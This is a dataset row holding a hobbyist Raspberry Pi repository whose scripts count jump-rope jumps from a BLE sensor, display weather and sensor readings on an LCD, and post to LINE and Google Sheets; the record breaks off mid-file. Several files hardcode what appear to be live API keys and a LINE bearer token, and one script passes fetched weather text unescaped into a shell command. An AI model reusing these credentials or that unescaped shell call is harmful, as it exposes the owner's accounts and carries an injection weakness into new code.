repo_name (string, length 5–114) | repo_url (string, length 24–133) | snapshot_id (string, length 40) | revision_id (string, length 40) | directory_id (string, length 40) | branch_name (string, 209 distinct values) | visit_date (timestamp[ns]) | revision_date (timestamp[ns]) | committer_date (timestamp[ns]) | github_id (int64, 9.83k–683M, nullable ⌀) | star_events_count (int64, 0–22.6k) | fork_events_count (int64, 0–4.15k) | gha_license_id (string, 17 distinct values) | gha_created_at (timestamp[ns]) | gha_updated_at (timestamp[ns]) | gha_pushed_at (timestamp[ns]) | gha_language (string, 115 distinct values) | files (list, length 1–13.2k) | num_files (int64, 1–13.2k) |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
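The rows below follow this schema, with `files` holding one JSON record per archived file. As a minimal sketch of how a consumer might use a parsed row — illustrative only, not part of the dump; the field names follow the schema above and the abbreviated sample values are taken from the ktrips/jump row — one can total the archived bytes per detected language:

```python
import json
from collections import defaultdict

def bytes_per_language(files):
    """Sum archived source bytes per detected language for one repository row."""
    totals = defaultdict(int)
    for f in files:
        totals[f["language"]] += f["length_bytes"]
    return dict(totals)

# Abbreviated per-file records from the ktrips/jump row below (illustrative sample).
sample_files = json.loads("""[
  {"path": "/jump.sh",     "language": "Shell",    "length_bytes": 85},
  {"path": "/forecast.py", "language": "Python",   "length_bytes": 1266},
  {"path": "/README.md",   "language": "Markdown", "length_bytes": 168}
]""")
print(bytes_per_language(sample_files))
# {'Shell': 85, 'Python': 1266, 'Markdown': 168}
```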
ktrips/jump | https://github.com/ktrips/jump | 5beb489f67179792a0d41a26881949be8d152ee3 | 73290dedc457757944ed6de4fab3a7fadd99e71d | 63b0ffb83a8940484a2f0eec8778636d4f9466b4 | refs/heads/master | 2023-01-07T06:17:48.415988 | 2020-11-09T10:14:42 | 2020-11-09T10:14:42 | 269,327,208 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7058823704719543,
"alphanum_fraction": 0.7176470756530762,
"avg_line_length": 20,
"blob_id": "8d80c589ed539b54eb9d97083021a33e5cb612b3",
"content_id": "0e6ffe9c2404cc0f86d8d22d98b4e3268337e4c7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 85,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 4,
"path": "/jump.sh",
"repo_name": "ktrips/jump",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\necho \"Start Jump!\"\ncd ~/Programs\nsudo python3 /home/pi/Programs/jump.py\n\n"
},
{
"alpha_fraction": 0.5205371379852295,
"alphanum_fraction": 0.5371248126029968,
"avg_line_length": 32.31578826904297,
"blob_id": "822013e27d2773969e4f0fd4779a6ba4e474bc69",
"content_id": "803b0e12f36ef6d87b6b5cf06fa78230b5fef8ba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1266,
"license_type": "no_license",
"max_line_length": 189,
"num_lines": 38,
"path": "/forecast.py",
"repo_name": "ktrips/jump",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\n# -*- coding: utf-8 -*-\nimport json\nimport datetime\nimport os\nimport requests\nimport sys\n\nfrom pytz import timezone\n\nAPI_KEY = \"05369ea6b08123aeacb3f72bb7f24ac2\"\nZIP = \"157-0066,JP\"\nAPI_URL = \"http://api.openweathermap.org/data/2.5/forecast?zip={0}&units=metric&lang=ja&APPID={1}\"\n\ndef getWeatherForecast():\n url = API_URL.format(ZIP, API_KEY)\n response = requests.get(url)\n forecastData = json.loads(response.text)\n\n if not ('list' in forecastData):\n print('error')\n return\n \n #print(forecastData)\n for item in forecastData['list']:\n forecastDatetime = timezone(\n 'Asia/Tokyo').localize(datetime.datetime.fromtimestamp(item['dt']))\n weatherDescription = item['weather'][0]['description']\n temperature = item['main']['temp']\n rainfall = 0\n if 'rain' in item and '3h' in item['rain']:\n rainfall = item['rain']['3h']\n break\n\n print('Date:{0} Weather:{1} Temp:{2} C Rain:{3}mm'.format(\n forecastDatetime, weatherDescription, temperature, rainfall))\n\ngetWeatherForecast()\n"
},
{
"alpha_fraction": 0.726190447807312,
"alphanum_fraction": 0.7321428656578064,
"avg_line_length": 17.66666603088379,
"blob_id": "db7ac9eeb99208d6623a3aaa0935243759a5f297",
"content_id": "039c071d82fd9b03d735a4793e9ae75958aef411",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 168,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 9,
"path": "/README.md",
"repo_name": "ktrips/jump",
"src_encoding": "UTF-8",
"text": "# jump\n## Jump scripts for Raspberry Pi\n### How to use:\n\n\n\n## Prerequisits\n### For Google Spreadsheet:\nsudo pip install --upgrade google-api-python-client oauth2client\n"
},
{
"alpha_fraction": 0.4257051348686218,
"alphanum_fraction": 0.4574004113674164,
"avg_line_length": 43.08333206176758,
"blob_id": "7a2bf1645474333bd212a07fc7912ab2e8a1aea3",
"content_id": "6a0294b9e31161506d871776461fa4d2c47dd234",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6980,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 156,
"path": "/jump_lcd.py",
"repo_name": "ktrips/jump",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# coding: utf-8\n\ninterval = 1 # 動作間隔\n\nfrom bluepy import btle\nfrom sys import argv\nimport getpass\nfrom time import sleep\nfrom datetime import datetime\n\nimport dothat.lcd as lcd\n\ndef payval(num, bytes=1, sign=False):\n global val\n a = 0\n for i in range(0, bytes):\n a += (256 ** i) * int(val[(num - 2 + i) * 2 : (num - 1 + i) * 2],16)\n if sign:\n if a >= 2 ** (bytes * 8 - 1):\n a -= 2 ** (bytes * 8)\n return a\n\nscanner = btle.Scanner()\nnow= datetime.now()\n#d = '{0:0>4d}/{1:0>2d}/{2:0>2d}({3})'.format(now.year, now.month, now.day, now.strftime('%a'))\nd = '{0:0>4d}/{1:0>2d}/{2:0>2d}'.format(now.year, now.month, now.day)\n#t = '{0:0>2d}:{1:0>2d}:{2:0>2d}'.format(now.hour, now.minute) #, now.second)\nt = '{0:0>2d}:{1:0>2d}'.format(now.hour, now.minute) #, now.second)\n\nimport requests\n\ndef line_message(text):\n url = \"https://notify-api.line.me/api/notify\"\n token = \"Zaj0BRu04W1aofVIm2AIxGdhuwI5fUayF9ji8sCBpru\"\n headers= {\"Authorization\":\"Bearer \"+token,\n \"Content-Type\":\"application/x-www-form-urlencoded\"}\n #message = 'message送信!'\n payload = {\"message\":text, \n \"stickerPackageId\":2, \n \"stickerId\":513}\n r = requests.post(url ,headers = headers ,params=payload)\n\ncount =0\nstart_seq=0\ncur_cnt =0\nwhile True:\n # BLE受信処理\n try:\n devices = scanner.scan(interval)\n except Exception as e:\n print(\"ERROR\",e)\n if getpass.getuser() != 'root':\n print('使用方法: sudo', argv[0])\n exit()\n sleep(interval)\n continue\n\n # 受信データについてBLEデバイス毎の処理\n for dev in devices:\n #print(\"\\nDevice %s (%s), RSSI=%d dB\" % (dev.addr, dev.addrType, dev.rssi))\n isRohmMedal = False\n sensors = dict()\n for (adtype, desc, val) in dev.getScanData():\n #print(\" %s = %s\" % (desc, val))\n if desc == 'Short Local Name' and val[0:18] == 'ROHMMedal2_0040_01': #Short Local Name = ROHMMedal2_0040_01.00\n isRohmMedal = True\n print(val)\n if isRohmMedal and desc == 'Manufacturer':\n\n # センサ値を辞書型変数sensorsへ代入\n sensors['ID'] = hex(payval(2,2))\n sensors['Temperature'] = -45 + 175 * payval(4,2) / 65536\n sensors['Humidity'] = 100 * payval(6,2) / 65536\n sensors['SEQ'] = payval(8)\n SEQ = sensors['SEQ']\n if SEQ == 1:\n start_seq+= 1\n zero_time = datetime.now()\n sensors['Condition Flags'] = bin(int(val[16:18],16))\n sensors['Accelerometer X'] = payval(10,2,True) / 4096\n sensors['Accelerometer Y'] = payval(12,2,True) / 4096\n sensors['Accelerometer Z'] = payval(14,2,True) / 4096\n sensors['Accelerometer'] = (sensors['Accelerometer X'] ** 2\\\n + sensors['Accelerometer Y'] ** 2\\\n + sensors['Accelerometer Z'] ** 2) ** 0.5\n sensors['Geomagnetic X'] = payval(16,2,True) / 10\n sensors['Geomagnetic Y'] = payval(18,2,True) / 10\n sensors['Geomagnetic Z'] = payval(20,2,True) / 10\n sensors['Geomagnetic'] = (sensors['Geomagnetic X'] ** 2\\\n + sensors['Geomagnetic Y'] ** 2\\\n + sensors['Geomagnetic Z'] ** 2) ** 0.5\n sensors['Pressure'] = payval(22,3) / 2048\n sensors['Illuminance'] = payval(25,2) / 1.2\n sensors['Magnetic'] = hex(payval(27))\n magnetic = sensors['Magnetic']\n \"\"\"if magnetic != '0x3':\n count+=1\n print(count)\"\"\"\n\n sensors['Steps'] = payval(28,2)\n step_cnt = sensors['Steps']\n if start_seq > 0:\n if start_seq == 1:\n start_time = zero_time\n cur_time= datetime.now()\n dur_time= cur_time - start_time\n cur_cnt = step_cnt\n cur_cal = round(cur_cnt/4)\n if cur_cnt != 0 and cur_cnt%100 == 0:\n text = str(cur_cnt)+\" jump completed!\"\n print(text)\n line_message(text)\n #t = '{0:0>2d}:{1:0>2d}:{2:0>2d}'.format(now.hour, now.minute, 
now.second)\n time_text= cur_time.strftime('%H:%M:%S')\n dur_text = \"Time {} {}\".format(dur_time.seconds, dur_time)\n jump_text= \"Jump \"+str(cur_cnt)+\" Cal \"+str(cur_cal) #+\" JPM \"+str(round(cur_cnt/dur_time.seconds))\n print(time_text)\n print(dur_text)\n print(jump_text) #'Count:',cur_cnt,', Duration:',duration,'-',round(duration.seconds))\n lcd.clear()\n lcd.set_cursor_position(0,0)\n lcd.write(time_text)\n lcd.set_cursor_position(0,1)\n lcd.write(dur_text)\n lcd.set_cursor_position(0,2)\n lcd.write(jump_text)\n\n sensors['Battery Level'] = payval(30)\n sensors['RSSI'] = dev.rssi\n\n # 画面へ表示\n #print(' ID =',sensors['ID'])\n print(' SEQ =',sensors['SEQ'])\n \"\"\"print(' Temperature =',round(sensors['Temperature'],2),'℃')\n print(' Humidity =',round(sensors['Humidity'],2),'%')\n print(' Pressure =',round(sensors['Pressure'],3),'hPa')\n print(' Illuminance =',round(sensors['Illuminance'],1),'lx')\n print(' Accelerometer =',round(sensors['Accelerometer'],3),'g (',\\\n round(sensors['Accelerometer X'],3),\\\n round(sensors['Accelerometer Y'],3),\\\n round(sensors['Accelerometer Z'],3),'g)')\n print(' Geomagnetic =',round(sensors['Geomagnetic'],1),'uT (',\\\n round(sensors['Geomagnetic X'],1),\\\n round(sensors['Geomagnetic Y'],1),\\\n round(sensors['Geomagnetic Z'],1),'uT)')\"\"\"\n #print(' Magnetic =',sensors['Magnetic'])\n print(' Steps =',sensors['Steps'],'Cnt')\n\n #print(' Battery Level =',sensors['Battery Level'],'%')\n #print(' RSSI =',sensors['RSSI'],'dB')\n\n '''\n for key, value in sorted(sensors.items(), key=lambda x:x[0]):\n print(' ',key,'=',value)\n '''\n\n"
},
{
"alpha_fraction": 0.49009352922439575,
"alphanum_fraction": 0.5211602449417114,
"avg_line_length": 35.25862121582031,
"blob_id": "0aca4b94c209046101b9b5faff417accc8adf510",
"content_id": "034d70a35082b9dde95990b0a59928f9cbe88485",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6413,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 174,
"path": "/ble_lcd_voice.py",
"repo_name": "ktrips/jump",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# coding: utf-8\n\nimport dothat\nimport dothat.backlight as backlight\nimport dothat.lcd as lcd\n\ninterval = 10 # 動作間隔\n\nfrom datetime import datetime\nfrom bluepy import btle\nfrom sys import argv\nimport getpass\nfrom time import sleep\n\nimport os\nimport RPi.GPIO as GPIO\nhuman_pin = 13\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(human_pin, GPIO.IN)\nhuman_count = 0\nhuman_check = 3\n\nimport json\nimport requests\nimport sys\n\nfrom pytz import timezone\n\nAPI_KEY = \"xxx\" #WeatherMap API Key\nZIP = \"123-4567,JP\" #Your address\nAPI_URL = \"http://api.openweathermap.org/data/2.5/forecast?zip={0}&units=metric&lang=ja&APPID={1}\"\naquest_path = \"/home/pi/Programs/aquestalkpi/\" #AquesTalkPi path\n\ndef getWeatherForecast():\n url = API_URL.format(ZIP, API_KEY)\n response = requests.get(url)\n forecastData = json.loads(response.text)\n if not ('list' in forecastData):\n print('error')\n return \n #print(forecastData)\n for item in forecastData['list']:\n forecastDatetime = timezone('Asia/Tokyo').localize(datetime.fromtimestamp(item['dt']))\n weatherDescription = item['weather'][0]['description']\n temperature = item['main']['temp']\n rainfall = 0\n if 'rain' in item and '3h' in item['rain']:\n rainfall = item['rain']['3h']\n break\n\n print('Date:{0} Weather:{1} Temp:{2} C Rain:{3}mm'.format(forecastDatetime, weatherDescription, temperature, rainfall))\n return forecastDatetime, weatherDescription, temperature, rainfall\n\ndef payval(num, bytes=1, sign=False):\n global val\n a = 0\n for i in range(0, bytes):\n a += (256 ** i) * int(val[(num - 2 + i) * 2 : (num - 1 + i) * 2],16)\n if sign:\n if a >= 2 ** (bytes * 8 - 1):\n a -= 2 ** (bytes * 8)\n return a\n\nscanner = btle.Scanner()\nwhile True:\n now = datetime.now()\n d = '{0:0>4d}/{1:0>2d}/{2:0>2d}({3})'.format(now.year, now.month, now.day, now.strftime('%a'))\n t = '{0:0>2d}:{1:0>2d}:{2:0>2d}'.format(now.hour, now.minute, now.second)\n forecastDatetime, weatherDescription, temperature, rainfall = getWeatherForecast()\n\n lcd.clear()\n lcd.set_cursor_position(0, 0)\n lcd.write('{}'.format(d))\n lcd.set_cursor_position(2, 1)\n lcd.write('{}'.format(t))\n lcd.set_cursor_position(0, 2)\n lcd.write('W:{1}C {2}mm'.format(round(temperature,0), rainfall))\n if rainfall > 0:\n print(weatherDescription, rainfall)\n os.system(aquest_path+'AquesTalkPi '+weatherDescription+' | aplay')\n \n human = GPIO.input(human_pin)\n if human == 1:\n human_count+=1\n else:\n human_count=0\n print('HCount:'+str(human_count))\n\n try:\n devices = scanner.scan(interval)\n except Exception as e:\n print(\"ERROR\",e)\n if getpass.getuser() != 'root':\n print('使用方法: sudo', argv[0])\n exit()\n sleep(interval)\n continue\n\n # 受信データについてBLEデバイス毎の処理\n for dev in devices:\n print(\"\\nDevice %s (%s), RSSI=%d dB\" % (dev.addr, dev.addrType, dev.rssi))\n isRohmMedal = False\n sensors = dict()\n for (adtype, desc, val) in dev.getScanData():\n print(\" %s = %s\" % (desc, val))\n if desc == 'Short Local Name' and val[0:10] == 'ROHMMedal2':\n isRohmMedal = True\n if isRohmMedal and desc == 'Manufacturer':\n # センサ値を辞書型変数sensorsへ代入\n sensors['ID'] = hex(payval(2,2))\n sensors['Temperature'] = -45 + 175 * payval(4,2) / 65536\n sensors['Humidity'] = 100 * payval(6,2) / 65536\n sensors['Pressure'] = payval(22,3) / 2048\n sensors['Illuminance'] = payval(25,2) / 1.2\n sensors['Battery Level'] = payval(30)\n sensors['RSSI'] = dev.rssi\n\n # 画面へ表示\n print(' ID =',sensors['ID'])\n print(' Temperature =',round(sensors['Temperature'],2),'℃')\n print(' 
Humidity =',round(sensors['Humidity'],2),'%')\n print(' Pressure =',round(sensors['Pressure'],3),'hPa')\n print(' Illuminance =',round(sensors['Illuminance'],1),'lx')\n print(' Battery Level =',sensors['Battery Level'],'%')\n print(' RSSI =',sensors['RSSI'],'dB')\n\n '''\n for key, value in sorted(sensors.items(), key=lambda x:x[0]):\n print(' ',key,'=',value)\n '''\n\n temp = sensors['Temperature']\n humid = sensors['Humidity']\n lcd.clear()\n dothat.backlight.set_graph(0.5) # 50%\n backlight.rgb(0, 0, 0)\n if temp > 28 or humid > 80:\n temp_msg = \"Hot!\"\n backlight.rgb(255, 0, 0) #Red\n else:\n temp_msg = \"Not bad\"\n \n illum = sensors['Illuminance']\n if illum < 200:\n illum_msg = \"Dark!\"\n os.system(\"sudo hub-ctrl -b 1 -d 2 -P 2 -p 1\")\n backlight.rgb(255, 255, 255)\n else:\n illum_msg = \"Bright\"\n os.system(\"sudo hub-ctrl -b 1 -d 2 -P 2 -p 0\")\n backlight.rgb(0, 0, 255) #Blue\n\n human_msg = str(human_count)\n dothat.backlight.off()\n for led in range(human_count):\n backlight.graph_set_led_state(led, 0.2)\n if human_count > human_check:\n human_msg += ' Take Rest!'\n backlight.rgb(0, 255, 0) #Green\n os.system(aquest_path+'AquesTalkPi \"休憩しましょう!\" | aplay')\n else:\n human_msg += ' Work Hard!'\n backlight.rgb(0, 255, 255) #Lightblue\n\n lcd.clear()\n lcd.set_cursor_position(0, 0)\n lcd.write('T:{0:1.0f}C {1:1.0f}% {2}'.format(temp,humid,temp_msg))\n lcd.set_cursor_position(0, 1)\n lcd.write('I:{0:1.0f} Lx {1}'.format(illum,illum_msg))\n lcd.set_cursor_position(0, 2)\n lcd.write('H:{}'.format(human_msg))\n \n sleep(interval)\n"
},
{
"alpha_fraction": 0.7025423645973206,
"alphanum_fraction": 0.7296609878540039,
"avg_line_length": 41.10714340209961,
"blob_id": "9722ef5893ef325a17b45ee02601527e4c50e9a5",
"content_id": "95bd95967739e8077e0c37b0bfa82805a7deac89",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1180,
"license_type": "no_license",
"max_line_length": 170,
"num_lines": 28,
"path": "/spreadsheet.py",
"repo_name": "ktrips/jump",
"src_encoding": "UTF-8",
"text": "import httplib2\nimport numpy as np\n\nfrom apiclient import discovery\nfrom oauth2client.service_account import ServiceAccountCredentials\n\nSCOPES = 'https://www.googleapis.com/auth/spreadsheets'\nAPPEND_RANGE = 'Sheet1!A1:G1'\n\nclass SpreadSheet(object):\n def __init__(self, sheet_id):\n self.sheetId = sheet_id\n\n credentials = ServiceAccountCredentials.from_json_keyfile_name('raspberryai-62aca965a8af.json', scopes=SCOPES)\n http_auth = credentials.authorize(httplib2.Http())\n discoveryUrl = ('https://sheets.googleapis.com/$discovery/rest?''version=v4')\n self.service = discovery.build('sheets', 'v4', http=http_auth, discoveryServiceUrl=discoveryUrl)\n\n def append(self, values):\n assert np.array(values).shape==(7,) , \"The shape of value %s must be 7\" % (np.array(values).shape)\n\n value_range_body = {'values':[values]}\n result = self.service.spreadsheets().values().append(spreadsheetId=self.sheetId, range=APPEND_RANGE, valueInputOption='USER_ENTERED', body=value_range_body).execute()\n #print(result)\n\nif __name__ == '__main__':\n sheet = SpreadSheet(\"1a_PQovhySYPV5D-rGhs1Soh7pvhGWmVltSPsSX_VmuA\")\n sheet.append([\"Date\", \"Time\", 999, 12345, 1999])\n\n"
},
{
"alpha_fraction": 0.4277404248714447,
"alphanum_fraction": 0.4671664834022522,
"avg_line_length": 38.66666793823242,
"blob_id": "b8f1854902ccd5db941077c2d5fff4ffa6c6b343",
"content_id": "42d7e9d854cf8dbf6a053e6edbb10789e2773bdb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7826,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 195,
"path": "/ble_disp.py",
"repo_name": "ktrips/jump",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# coding: utf-8\n\nfrom __future__ import (division, absolute_import, print_function,\n unicode_literals)\n\nimport fcntl\nimport socket\nimport struct\n\nimport dothat\nimport dothat.backlight as backlight\nimport dothat.lcd as lcd\n\ndef get_addr(ifname):\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n return socket.inet_ntoa(\n fcntl.ioctl(\n s.fileno(),\n 0x8915, # SIOCGIFADDR\n struct.pack('256s', ifname[:15].encode('utf-8')))[20:24])\n except IOError:\n return 'Not Found!'\n\n\neth0 = get_addr('eth0')\nhost = socket.gethostname()\n\ninterval = 10 # 動作間隔\n\nfrom datetime import datetime\nfrom bluepy import btle\nfrom sys import argv\nimport getpass\nfrom time import sleep\n\nimport os\n\nimport RPi.GPIO as GPIO\nhuman_pin = 13\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(human_pin, GPIO.IN)\nhuman_count = 0\nhuman_check = 3\n\ndef payval(num, bytes=1, sign=False):\n global val\n a = 0\n for i in range(0, bytes):\n a += (256 ** i) * int(val[(num - 2 + i) * 2 : (num - 1 + i) * 2],16)\n if sign:\n if a >= 2 ** (bytes * 8 - 1):\n a -= 2 ** (bytes * 8)\n return a\n\nscanner = btle.Scanner()\nwhile True:\n now = datetime.now()\n d = '{0:0>4d}/{1:0>2d}/{2:0>2d}({3})'.format(now.year, now.month, now.day, now.strftime('%a'))\n t = '{0:0>2d}:{1:0>2d}:{2:0>2d}'.format(now.hour, now.minute, now.second)\n wlan0 = get_addr('wlan0')\n\n lcd.clear()\n lcd.set_cursor_position(0, 0)\n lcd.write('{}'.format(wlan0))\n lcd.set_cursor_position(0, 1)\n lcd.write('{}'.format(d))\n lcd.set_cursor_position(2, 2)\n lcd.write('{}'.format(t))\n\n human = GPIO.input(human_pin)\n if human == 1:\n human_count+=1\n else:\n human_count=0\n print('HCount:'+str(human_count))\n\n try:\n devices = scanner.scan(interval)\n except Exception as e:\n print(\"ERROR\",e)\n if getpass.getuser() != 'root':\n print('使用方法: sudo', argv[0])\n exit()\n sleep(interval)\n continue\n\n # 受信データについてBLEデバイス毎の処理\n for dev in devices:\n print(\"\\nDevice %s (%s), RSSI=%d dB\" % (dev.addr, dev.addrType, dev.rssi))\n isRohmMedal = False\n sensors = dict()\n for (adtype, desc, val) in dev.getScanData():\n print(\" %s = %s\" % (desc, val))\n if desc == 'Short Local Name' and val[0:18] == 'ROHMMedal2_0107_01': #val[0:10] == 'ROHMMedal2':\n isRohmMedal = True\n if isRohmMedal and desc == 'Manufacturer':\n\n # センサ値を辞書型変数sensorsへ代入\n sensors['ID'] = hex(payval(2,2))\n sensors['Temperature'] = -45 + 175 * payval(4,2) / 65536\n sensors['Humidity'] = 100 * payval(6,2) / 65536\n \"\"\"sensors['SEQ'] = payval(8)\n sensors['Condition Flags'] = bin(int(val[16:18],16))\n sensors['Accelerometer X'] = payval(10,2,True) / 4096\n sensors['Accelerometer Y'] = payval(12,2,True) / 4096\n sensors['Accelerometer Z'] = payval(14,2,True) / 4096\n sensors['Accelerometer'] = (sensors['Accelerometer X'] ** 2\\\n + sensors['Accelerometer Y'] ** 2\\\n + sensors['Accelerometer Z'] ** 2) ** 0.5\n sensors['Geomagnetic X'] = payval(16,2,True) / 10\n sensors['Geomagnetic Y'] = payval(18,2,True) / 10\n sensors['Geomagnetic Z'] = payval(20,2,True) / 10\n sensors['Geomagnetic'] = (sensors['Geomagnetic X'] ** 2\\\n + sensors['Geomagnetic Y'] ** 2\\\n + sensors['Geomagnetic Z'] ** 2) ** 0.5\"\"\"\n sensors['Pressure'] = payval(22,3) / 2048\n sensors['Illuminance'] = payval(25,2) / 1.2\n \"\"\"sensors['Magnetic'] = hex(payval(27))\n sensors['Steps'] = payval(28,2)\"\"\"\n sensors['Battery Level'] = payval(30)\n sensors['RSSI'] = dev.rssi\n\n # 画面へ表示\n print(' ID =',sensors['ID'])\n #print(' SEQ =',sensors['SEQ'])\n print(' Temperature 
=',round(sensors['Temperature'],2),'℃')\n print(' Humidity =',round(sensors['Humidity'],2),'%')\n print(' Pressure =',round(sensors['Pressure'],3),'hPa')\n print(' Illuminance =',round(sensors['Illuminance'],1),'lx')\n \"\"\"print(' Accelerometer =',round(sensors['Accelerometer'],3),'g (',\\\n round(sensors['Accelerometer X'],3),\\\n round(sensors['Accelerometer Y'],3),\\\n round(sensors['Accelerometer Z'],3),'g)')\n print(' Geomagnetic =',round(sensors['Geomagnetic'],1),'uT (',\\\n round(sensors['Geomagnetic X'],1),\\\n round(sensors['Geomagnetic Y'],1),\\\n round(sensors['Geomagnetic Z'],1),'uT)')\n print(' Magnetic =',sensors['Magnetic'])\n print(' Steps =',sensors['Steps'],'歩')\"\"\"\n print(' Battery Level =',sensors['Battery Level'],'%')\n print(' RSSI =',sensors['RSSI'],'dB')\n\n '''\n for key, value in sorted(sensors.items(), key=lambda x:x[0]):\n print(' ',key,'=',value)\n '''\n\n temp = sensors['Temperature']\n humid = sensors['Humidity']\n lcd.clear()\n dothat.backlight.set_graph(0.5) # 50%\n backlight.rgb(0, 0, 0)\n if temp > 28 or humid > 80:\n temp_msg = \"Hot!\"\n #dothat.backlight.single_rgb(1, 255, 0, 0)\n backlight.rgb(255, 0, 0)\n else:\n temp_msg = \"Comfort\"\n illum = sensors['Illuminance']\n if illum < 300:\n illum_msg = \"Dark!\"\n os.system(\"sudo hub-ctrl -b 1 -d 2 -P 2 -p 1\")\n #dothat.backlight.single_rgb(2, 255, 255, 255)\n backlight.rgb(255, 255, 255)\n else:\n illum_msg = \"Bright\"\n os.system(\"sudo hub-ctrl -b 1 -d 2 -P 2 -p 0\")\n #dothat.backlight.single_rgb(2, 0, 0, 255)\n backlight.rgb(0, 0, 255)\n\n human_msg = str(human_count)\n dothat.backlight.off()\n for led in range(human_count):\n backlight.graph_set_led_state(led, 0.2)\n if human_count > human_check:\n human_msg += ' Take Rest!'\n lcd.clear()\n #dothat.backlight.single_rgb(3, 0, 255, 0)\n backlight.rgb(0, 255, 0)\n else:\n human_msg += ' Work Hard!'\n lcd.clear()\n #dothat.backlight.single_rgb(3, 0, 255, 255)\n backlight.rgb(0, 255, 255)\n\n lcd.clear()\n lcd.set_cursor_position(0, 0)\n lcd.write('T:{0:1.0f}C {1:1.0f}% {2}'.format(temp,humid,temp_msg))\n lcd.set_cursor_position(0, 1)\n lcd.write('I:{0:1.0f} Lx {1}'.format(illum,illum_msg))\n lcd.set_cursor_position(0, 2)\n lcd.write('H:{}'.format(human_msg))\n sleep(interval)\n\n"
},
{
"alpha_fraction": 0.4566326439380646,
"alphanum_fraction": 0.4901738464832306,
"avg_line_length": 37.765567779541016,
"blob_id": "24b0baa7fdf94d35d5cf32b215f66544c493f65e",
"content_id": "b2fcb1670b84aa98b6dc150deaa8c0cbd5c5e5a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11242,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 273,
"path": "/jump.py",
"repo_name": "ktrips/jump",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# coding: utf-8\n\nfrom tkinter import *\nfrom datetime import datetime\n\n# メインウィンドウ作成\nroot = Tk()\n\n# メインウィンドウサイズ\nroot.geometry(\"1024x600\") #720x480\")\n\n# メインウィンドウタイトル\nroot.title(\"Jump\")\n\n# Canvas 作成\nc = Canvas(root, bg=\"#FFFFFF\", width=1024, height=600) #720, height=480)\nc.pack(expand=True, fill=BOTH)\n\n# 文字列作成\nch = c.create_text(520, 30, font=('', 30, ''), fill='black')\nc1 = c.create_text(500, 80, font=('', 30, ''), fill='black')\nc2 = c.create_text(500, 150, font=('', 55, 'bold'), fill='red')\nc3 = c.create_text(500, 250, font=('', 45, ''), fill='blue')\nc4 = c.create_text(500, 350, font=('', 30, ''), fill='green')\nc5 = c.create_text(500, 420, font=('', 30, ''), fill='green')\n\n# 画面がリサイズされたとき\ndef change_size(event):\n # 画面の中心座標を取得\n w = c.winfo_width() / 2\n h = c.winfo_height() / 2\n\n # 文字列の矩形の中心座標を取得\n cd_coords = c.bbox(cd)\n cd_w = cd_coords[0] + (cd_coords[2] - cd_coords[0]) / 2\n cd_h = cd_coords[1] + (cd_coords[3] - cd_coords[1]) / 2\n ct_coords = c.bbox(ct)\n ct_w = ct_coords[0] + (ct_coords[2] - ct_coords[0]) / 2\n ct_h = ct_coords[1] + (ct_coords[3] - ct_coords[1]) / 2\n\n # 中心座標を合わせるように移動\n c.move(cd, w - cd_w, h - cd_h - 60)\n c.move(ct, w - ct_w, h - ct_h + 60)\n\ninterval = 1 # 動作間隔\n\nfrom bluepy import btle\nfrom sys import argv\nimport getpass\nfrom time import sleep\nfrom datetime import datetime\njson_dir = \"/home/pi/Programs/\"\nimport json\njson_open = open(json_dir+'tokai53.json', 'r')\njson_load = json.load(json_open)\n\ndef payval(num, bytes=1, sign=False):\n global val\n a = 0\n for i in range(0, bytes):\n a += (256 ** i) * int(val[(num - 2 + i) * 2 : (num - 1 + i) * 2],16)\n if sign:\n if a >= 2 ** (bytes * 8 - 1):\n a -= 2 ** (bytes * 8)\n return a\n\nscanner = btle.Scanner()\nnow= datetime.now()\nd = '{0:0>4d}/{1:0>2d}/{2:0>2d}'.format(now.year, now.month, now.day)\nt = '{0:0>2d}:{1:0>2d}'.format(now.hour, now.minute) #, now.second)\n\nimport requests\n\ndef line_message(text):\n url = \"https://notify-api.line.me/api/notify\"\n token = \"aaaa\"\n headers= {\"Authorization\":\"Bearer \"+token,\n \"Content-Type\":\"application/x-www-form-urlencoded\"}\n #message = 'message送信!'\n payload = {\"message\":text,\n \"stickerPackageId\":2,\n \"stickerId\":513}\n r = requests.post(url ,headers = headers ,params=payload)\n\n\nfrom spreadsheet import SpreadSheet\nspreadsheet_name = 'xxx'\nkey_name = json_dir+'yyy.json'\nsheet_name= 'zzz' #Sheet1' # シート名\n\nsheet = SpreadSheet(spreadsheet_name)\n\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\n\ndef get_spreadsheet(searchKey):\n scope = ['https://spreadsheets.google.com/feeds','https://www.googleapis.com/auth/drive']\n credentials = ServiceAccountCredentials.from_json_keyfile_name(key_name, scope)\n gc = gspread.authorize(credentials) # JSONキーファイルで認証\n wks = gc.open(sheet_name).sheet1 # sheetをオープン\n records = wks.get_all_values() # 中身を取り出して配列に保存\n for i in range(1, len(records)): # sheetの行数分だけ繰り返す\n if records[i][0] == 